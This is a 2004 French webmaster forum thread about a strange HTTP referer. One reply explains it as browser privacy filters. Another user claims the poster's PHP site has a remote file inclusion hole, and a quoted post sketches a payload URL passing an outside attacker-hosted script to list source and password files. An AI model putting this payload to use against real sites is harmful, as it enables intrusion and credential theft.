provenance XXXX:++++++++++++++++
Consultez la formation au REFERENCEMENT naturel Google de WebRankInfo / Ranking Metrics
-
sietjp - WRInaute impliqué
- Messages: 624
- Inscription: 14 Déc 2003
provenance XXXX:++++++++++++++++
le Dim Jan 25, 2004 13:35
Depuis une semaine , j'ai vu arriver 2 fois sur la page d'acceuil de mon site un internaute dont l'http referer est "XXXX:++++++++++++++++" au lieu de l'habituel http ://www . site . com/sdfjkl
j'ai bien fait ma recherche dans webrankinfo comme un bon petit gars qui commence à comprendre comment ça se passe mais je n'ai pas trouvé, peut être avez vous déjà vu ça?
- fredsoft
- WRInaute discret
- Messages: 242
- Inscription: 26 Jan 2003
le Dim Jan 25, 2004 14:37
parce que te hacker pas spécialement dur :
http://www.observatoire-environnement.o ... l=toto.htm
avec cette faille on peux lister tes sources php et autre fichiers de passwords
- fredsoft
- WRInaute discret
- Messages: 242
- Inscription: 26 Jan 2003
le Dim Jan 25, 2004 15:49
suiffit que toto.php renvoie ce qu'il faut pour lister les sources..donc les fichiers de password
- Eservice
- WRInaute passionné
- Messages: 1463
- Inscription: 18 Sep 2002
Re: provenance XXXX:++++++++++++++++
le Dim Jan 25, 2004 15:49
Bonjour,sietjp a écrit:peut être avez vous déjà vu ça?
oui certains internautes utilisent un filtre Web qui mouline tout ce qui entre et sort de leur navigateur (variable HTTP, javascript, cookies).
Dans ce cas c'est le referer qui est remplacé par n'importe quoi. Ca ne sert à rien à part gêner le suivi d'audience des webmestres. C'est de la paranoïa pure et simple.
-
DAVID86 - WRInaute passionné
- Messages: 1181
- Inscription: 15 Oct 2003
le Dim Jan 25, 2004 15:59
fredsoft a écrit:ton script permet d'envoyer du code a distance en faisant un truc du genre index.php?url=http://hackme.free.fr/toto.php par exemple
suiffit que toto.php renvoie ce qu'il faut pour lister les sources..donc les fichiers de password
non car les chaines de caractères sont validées, et même en essayant des commandes simples, ça bloque . je connaissais cette combine. Mais peut être en as tu une de spéciale?
- fredsoft
- WRInaute discret
- Messages: 242
- Inscription: 26 Jan 2003
le Dim Jan 25, 2004 16:23
Formation recommandée sur ce thème :
Formation REFERENCEMENT naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Script de mise en cache des pages (PHP MySQL) - 09-08-2010
- Pas de referrers Windows Live Search - 18-09-2006
- Configurer des nouveaux moteurs dans Google Analytics - 12-06-2007
- 1ère faille de sécurité découverte sur Google Chrome - 03-09-2008
- Google achète Measure Map - 15-02-2006
- HTML5 rel=noreferrer : suppression du referrer ? - 04-01-2010
- MyMaps : des cartes personnalisées avec Google Maps - 05-04-2007
- Aux USA, Gmail dépasse YouTube en nombre de visiteurs - 13-03-2009
Consultez la description détaillée des produits ou services de Google suivants : Google WebQuotes, Google Measure Map
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités
Contact
Confidentialité